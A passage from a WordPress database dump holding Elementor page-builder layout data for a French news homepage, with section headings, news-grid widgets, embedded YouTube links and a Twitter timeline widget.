\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2359,759,'_elementor_version','0.4'),(2360,759,'_elementor_css','a:3:{s:4:\"time\";i:1509370482;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2362,760,'_elementor_edit_mode','builder'),(2363,760,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur 